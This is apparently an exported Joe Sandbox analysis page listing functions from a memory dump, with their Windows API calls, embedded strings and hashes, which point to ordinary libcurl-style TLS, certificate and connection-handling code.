Instruction ID: 40e2d8c6fe9a736eac457fb2e15d69b725f8c1f70b72295907f73d98e11287a7
Opcode Fuzzy Hash: a6d818fb4a2c307812207ee7f595a45ed0817d4fdf6314baf44f2e20bf34eca0
Instruction Fuzzy Hash: 74D14A71B04686AFFB288B759881FBEB7E5FF45310F14812BE814B7281CB726D528791

Function 0010CAA0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 562COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB20
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB42
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB9C
___from_strstr_to_strchr.LIBCMT ref: 0010CD4F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D01D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D033

Strings

rwx-tTsS, xrefs: 0010CF11
APM0123456789:, xrefs: 0010CD4A
total , xrefs: 0010CDF8
<DIR>, xrefs: 0010CCA0, 0010CCB7
0123456789-, xrefs: 0010CD81

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$___from_strstr_to_strchrcallocmallocrealloc
String ID: 0123456789-$<DIR>$APM0123456789:$rwx-tTsS$total
API String ID: 1091099985-2767756851
Opcode ID: 6253f93ada8ffb00ced36f94e6aa44c273c440c34678d1067a317ac09f356131
Instruction ID: 5ccd546dc08adec6006c31d7e537912f5b3ed3ebfc88350b42f9f26d509002d2
Opcode Fuzzy Hash: 6253f93ada8ffb00ced36f94e6aa44c273c440c34678d1067a317ac09f356131
Instruction Fuzzy Hash: E8226870A04A029FD728CF69D644A21BBF1FF94310F15861AE49AC7AD1D7B1F891CF92

Function 0010EC10 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 150encryptionCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000002,?,00000002,0000000E,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0010ECEF
CertAddCertificateContextToStore.CRYPT32(?,?,00000004,00000000), ref: 0010ED23
CertFreeCertificateContext.CRYPT32(?), ref: 0010ED31
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010ED54

Strings

-----BEGIN CERTIFICATE-----, xrefs: 0010EC65
schannel: unexpected content type '%d' when extracting certificate from CA file '%s', xrefs: 0010ED78
schannel: did not add any certificates from CA file '%s', xrefs: 0010EDCF
-----END CERTIFICATE-----, xrefs: 0010EC96
schannel: failed to add certificate from CA file '%s' to certificate store: %s, xrefs: 0010ED6A
schannel: CA file '%s' is not correctly formatted, xrefs: 0010EDAC
schannel: failed to extract certificate from CA file '%s': %s, xrefs: 0010ED96
schannel: added %d certificate(s) from CA file '%s', xrefs: 0010EDE5

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
API String ID: 854292303-665156428
Opcode ID: 19c83eb63d6f7f9e53848c4f14786106108d17280add3ba8e853939eeed7b8be
Instruction ID: 5c7bb0b7339ed877f27e9cbb2344b3503c5439c9e5c650af44ee795360fa5d33
Opcode Fuzzy Hash: 19c83eb63d6f7f9e53848c4f14786106108d17280add3ba8e853939eeed7b8be
Instruction Fuzzy Hash: 9251B671E0022CABDB299F55DC46FEDB7B5EB48710F0045DAF549A6281DBB04E918F90

Function 000D4415 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 381stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,74F81980,00000001), ref: 000D461F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000D462A
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000D463A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000D4645
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000D4650
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000D465D

Strings

%02d:%02d:%02d%n, xrefs: 000D45D2
%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 000D44AF
%02d:%02d%n, xrefs: 000D45FF
GMT, xrefs: 000D4567

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _errno$strtol
String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
API String ID: 3596500743-988243589
Opcode ID: cbfc1e3fa45dc1c0c23844fbcc274ddc7b43d8af77e3544b711a52404730c3fe
Instruction ID: 784fa7cfd79f1dc666b5e3b29f8fa7bea7d942e293284b5aa8ac628642b4989a
Opcode Fuzzy Hash: cbfc1e3fa45dc1c0c23844fbcc274ddc7b43d8af77e3544b711a52404730c3fe
Instruction Fuzzy Hash: CAD15D71E047189FCF64DFB8D8846EDBBF6AB4A320F24422BE425E7395D73099418B60

Function 0010F02B Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 162encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0B38: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,RtlVerifyVersionInfo), ref: 000D0B6D
Part of subcall function 000D0B38: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 000D0B74

CertGetNameStringA.CRYPT32(?,00000006,00010002,00000000,?,000001B8), ref: 0010F073

Strings

schannel: Empty DNS name., xrefs: 0010F13E
schannel: Null certificate info., xrefs: 0010F0BC
schannel: CryptDecodeObjectEx() returned no alternate name information., xrefs: 0010F111
schannel: Null certificate context., xrefs: 0010F0A3
schannel: CertFindExtension() returned no extension., xrefs: 0010F0D8
2.5.29.17, xrefs: 0010F0C9, 0010F0FD
schannel: Not enough memory to list all host names., xrefs: 0010F1C3

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: AddressCertHandleModuleNameProcString
String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
API String ID: 4138448956-2160583098
Opcode ID: 6f756fbe0d475cefdf2571d78920c1a80f7b08f5f5761bd097077f4051d4b11c
Instruction ID: bfe50978bbb6c815b883797b414432e5e488ae89dec8d9b5fd3136ae038f6018
Opcode Fuzzy Hash: 6f756fbe0d475cefdf2571d78920c1a80f7b08f5f5761bd097077f4051d4b11c
Instruction Fuzzy Hash: 06519431A00205EFCB25DF64DC42AAEBBF5EF48714F14C16EE545EB686E7B09942CB90

Function 000CE127 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 000CE18F
__aulldiv.LIBCMT ref: 000CE1DF

Strings

%2I64d.%0I64dM, xrefs: 000CE19F
%4I64dT, xrefs: 000CE232
%5I64d, xrefs: 000CE147
%2I64d.%0I64dG, xrefs: 000CE1EF
%4I64dM, xrefs: 000CE1BE
%4I64dG, xrefs: 000CE218
%4I64dP, xrefs: 000CE23E
%4I64dk, xrefs: 000CE168

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __aulldiv
String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
API String ID: 3732870572-2102732564
Opcode ID: 35d37c5448af0b7153d78018f3240e87b79f6883f1113dd3c83959d112f7de6f
Instruction ID: d9a0efd48118e8d60718192659bcd2ccae835e88a0c7e34038b3ef776810a0f9
Opcode Fuzzy Hash: 35d37c5448af0b7153d78018f3240e87b79f6883f1113dd3c83959d112f7de6f
Instruction Fuzzy Hash: 0631B173E416E535E938170AEC4AFAF580E8796B24B1A063EFC19B318395B1586090F2

Function 000E25B8 Relevance: 14.4, Strings: 11, Instructions: 633COMMON

Download Yara Rule

Strings

Server doesn't support multiplex (yet), xrefs: 000E26D2
Found pending candidate for reuse and CURLOPT_PIPEWAIT is set, xrefs: 000E2E09
Multiplexed connection found, xrefs: 000E2DD7
Can not multiplex, even if we wanted to, xrefs: 000E2712
Server doesn't support multiplex yet, wait, xrefs: 000E26A6
Could multiplex, but not asked to, xrefs: 000E26FA
Connection #%ld is still name resolving, can't reuse, xrefs: 000E27B4
can multiplex, xrefs: 000E2675, 000E267D
Connection #%ld isn't open enough, can't reuse, xrefs: 000E27D4
serially, xrefs: 000E2670
Found bundle for host: %p [%s], xrefs: 000E267F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: Can not multiplex, even if we wanted to$Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Could multiplex, but not asked to$Found bundle for host: %p [%s]$Found pending candidate for reuse and CURLOPT_PIPEWAIT is set$Multiplexed connection found$Server doesn't support multiplex (yet)$Server doesn't support multiplex yet, wait$can multiplex$serially
API String ID: 0-1297456373
Opcode ID: 756cadd374506fc139bdb7e363ef8da14c203d22079d172d18e8d037cd71d77d
Instruction ID: a33a857d362d18074179ae1781c2c2dd40a59c8545e4e8e76c3f408e8b57debc
Opcode Fuzzy Hash: 756cadd374506fc139bdb7e363ef8da14c203d22079d172d18e8d037cd71d77d
Instruction Fuzzy Hash: F132B130A08BC18FDFB6CB3685957FA7BEA6F52304F1C84A9C8D56B252D721AC85C711

Function 000F8490 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129networkCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F84DB
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F854E
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F8580
bind.WS2_32(?,00000030,?), ref: 000F85FC
WSAGetLastError.WS2_32 ref: 000F8607

Strings

bind() failed; %s, xrefs: 000F861B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: calloc$ErrorLastbind
String ID: bind() failed; %s
API String ID: 2604820300-1141498939
Opcode ID: daaf41e9b35d228897ceaa02e4117f47f4f05389ee7ece60dda9c8d98ee92e90
Instruction ID: 71ea948a4fdfbf687f31bfd7749051c19c4bc55f0c84b660c455bc3371f82eb0
Opcode Fuzzy Hash: daaf41e9b35d228897ceaa02e4117f47f4f05389ee7ece60dda9c8d98ee92e90
Instruction Fuzzy Hash: 19519070604609DFDB28CF24D849BE8B7E0FF44710F1481AAE909DB691DBB0AD808F91

Function 00106591 Relevance: 10.6, APIs: 7, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040), ref: 001065D2
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 001065EC
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 001065FD
CryptGetHashParam.ADVAPI32(?,00000004,?,00000004,00000000,?,?,00000000), ref: 00106616
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?,00000000), ref: 00106633
CryptDestroyHash.ADVAPI32(00000000), ref: 00106642
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00106653

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
String ID:
API String ID: 3606780921-0
Opcode ID: acaac6512a7262268ed1ee025954450f218ed0da67ac9a4ec9c34d7bc985b645
Instruction ID: af54297d4700f5ced7f9fe06d6b89323ef845d5c29ec459b4c342da0074602b4
Opcode Fuzzy Hash: acaac6512a7262268ed1ee025954450f218ed0da67ac9a4ec9c34d7bc985b645
Instruction Fuzzy Hash: 9621E971A40208FBEB209F94DD4AFDEBBB9EB48740F108065B604F60E0D7B19A54DBA4

Function 0010F860 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37encryptionCOMMON

Download Yara Rule

APIs

CryptGetHashParam.ADVAPI32(?,00000002,00000000,00000000,00000000,?,00000000,?,?,0010F8EB,?,?,?,?,00109C33,00000000), ref: 0010F879
CryptGetHashParam.ADVAPI32(?,00000002,?,00000020,00000000,?,?,0010F8EB,?,?,?,?,00109C33,00000000,?), ref: 0010F892
CryptDestroyHash.ADVAPI32(?,?,?,0010F8EB,?,?,?,?,00109C33,00000000,?), ref: 0010F8A0
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,0010F8EB,?,?,?,?,00109C33,00000000,?), ref: 0010F8AD

Strings

, xrefs: 0010F87F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Crypt$Hash$Param$ContextDestroyRelease
String ID:
API String ID: 2110207923-3916222277
Opcode ID: 04b14245f38b4746b3eddebb8276ddac9791028e6c019874530e33f4f7c19e03
Instruction ID: 971691c3af297365410f3524c0c6d9aca79aeb3a23842ffc31267fddbad5d96e
Opcode Fuzzy Hash: 04b14245f38b4746b3eddebb8276ddac9791028e6c019874530e33f4f7c19e03
Instruction Fuzzy Hash: 31F04935400608FFDB318F81DE0ADDABBBAEBC5B01B508029F585A2860D3719E80EB90

Function 000C310D Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0(00000008,00000000), ref: 000C3148
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000C3155
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000C316F
Module32First.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2(00000000,00000224), ref: 000C318D
Module32Next.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2(00000000,00000224), ref: 000C31B2

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Module32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32
String ID:
API String ID: 3822340588-0
Opcode ID: e2078b7174e8b06bfb1fb3fc9c33bd7a6e5a30c2fe1fc711e2bb7873bd5d23d4
Instruction ID: d8a2646e97e56ba06530091ed1655ab07664aad968fe58464157b85524258c3b
Opcode Fuzzy Hash: e2078b7174e8b06bfb1fb3fc9c33bd7a6e5a30c2fe1fc711e2bb7873bd5d23d4
Instruction Fuzzy Hash: DF110631600214BFD761ABB5AC4DFEE76AADB85320F084269FC15D31D0DF708EC58665

Function 000E77F7 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7864
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E78B8

Strings

-----END PUBLIC KEY-----, xrefs: 000E7839
-----BEGIN PUBLIC KEY-----, xrefs: 000E7811

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: freemalloc
String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----
API String ID: 3061335427-1157147699
Opcode ID: fb5e5ce8564725f377d08c0b0c630e3565ed0d47c8498df8b52b0efe2b277031
Instruction ID: 6fb02ffe782cb6d324dabc6979cb8550493b5174c2d74772933e210f981e727d
Opcode Fuzzy Hash: fb5e5ce8564725f377d08c0b0c630e3565ed0d47c8498df8b52b0efe2b277031
Instruction Fuzzy Hash: FB214B32B48255AFDB298B69E94876DBBE6EB50350F604036D448E7280DF709C40C6A1

Function 0011155B Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00111567
IsDebuggerPresent.KERNEL32 ref: 00111633
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00111653
UnhandledExceptionFilter.KERNEL32(?), ref: 0011165D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d9d830d40c799f2f1d340e38f31dc7d946a1d0ead44049839d1e9a8f7ed135d2
Instruction ID: def865267ac481e0e0397b7d8ab5b13b4844350a7af5696b23c5c55063442b99
Opcode Fuzzy Hash: d9d830d40c799f2f1d340e38f31dc7d946a1d0ead44049839d1e9a8f7ed135d2
Instruction Fuzzy Hash: C63116B5D05718DBDB20DFA4D989BCCBBB8AF08300F1041AAE50DAB250EB719AC5CF54

Function 0010C750 Relevance: 6.0, APIs: 4, Instructions: 37encryptionCOMMON

Download Yara Rule

APIs

CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 0010C769
CryptGetHashParam.ADVAPI32(00000010,00000002,?,00000010,00000000), ref: 0010C782
CryptDestroyHash.ADVAPI32(00000010), ref: 0010C790
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0010C79D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Crypt$Hash$Param$ContextDestroyRelease
String ID:
API String ID: 2110207923-0
Opcode ID: 0b8efa564c7ad2773e73af284ff647941f752af4c1d8419ce01c6662fa6b23a9
Instruction ID: ab05f4f81f173bb1995db3058298c4698223b08b211e16d04805214754efef52
Opcode Fuzzy Hash: 0b8efa564c7ad2773e73af284ff647941f752af4c1d8419ce01c6662fa6b23a9
Instruction Fuzzy Hash: E7F04935400608FFDB218F85DE49C9BBBBAEBC5B01B508128F586A24A0C3719E40EF90

Function 00106400 Relevance: 4.5, APIs: 3, Instructions: 37encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 00106417
CryptGenRandom.ADVAPI32(?,?,?), ref: 00106430
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00106445

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 6a2d693b4177f3b5faac93daba463c6da7d4dd9db6f7990f48b01b373ffedf91
Instruction ID: 20fe1ef92fe60ca3f06b5a29f2b65bf8b6ac1db374db26f3b2ea1972efed0a21
Opcode Fuzzy Hash: 6a2d693b4177f3b5faac93daba463c6da7d4dd9db6f7990f48b01b373ffedf91
Instruction Fuzzy Hash: 1AF05E72600154FBDB308B96DD0AFDB7E79EBC8B50F118014F605E6090D7B08950E751

Function 0010C6E0 Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,00000000,74F80130,?,0010C800,00000000), ref: 0010C6F4
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000004,?,0010C800,00000000), ref: 0010C710
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0010C800,00000000), ref: 0010C71D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Crypt$Context$AcquireCreateHashRelease
String ID:
API String ID: 4045725610-0
Opcode ID: 20f8c5d8c2c270a033f67b63a70a32fba50ac38356f8de2c339d2a1b6a5622ae
Instruction ID: 8754077cc55693caf487b6fbe9c1243091f557179b198746938bcbbaf2cb8467
Opcode Fuzzy Hash: 20f8c5d8c2c270a033f67b63a70a32fba50ac38356f8de2c339d2a1b6a5622ae
Instruction Fuzzy Hash: F2F03035200244FAE7344B63ED0CE977F6DEBC5B90B114429F685D50A0D7A195409EA4

Function 000DA9B3 Relevance: 4.1, APIs: 2, Instructions: 1557COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e71fda9ab858a68a3d86d4f2b1c101caa93887c50daf405530c610dceef86b3
Instruction ID: b1f809425ede0197c6ebb029a95f6663ecec37494d1d593a6f199e68db430512
Opcode Fuzzy Hash: 5e71fda9ab858a68a3d86d4f2b1c101caa93887c50daf405530c610dceef86b3
